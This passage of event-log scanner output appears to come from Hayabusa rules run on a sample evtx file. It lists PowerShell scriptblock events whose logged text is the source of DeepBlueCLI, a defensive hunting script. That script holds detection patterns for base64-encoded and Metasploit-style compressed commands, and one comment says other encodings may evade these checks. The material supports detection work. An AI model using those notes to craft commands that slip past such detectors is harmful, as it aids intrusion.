$eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:37.536 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:37.536 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:37.536 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:37.539 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:37.545 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:37.547 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:23:59.512 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:23:59.512 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:23:59.513 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:23:59.514 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:24:04.587 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:25:39.074 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:25:40.257 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:25:40.262 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running 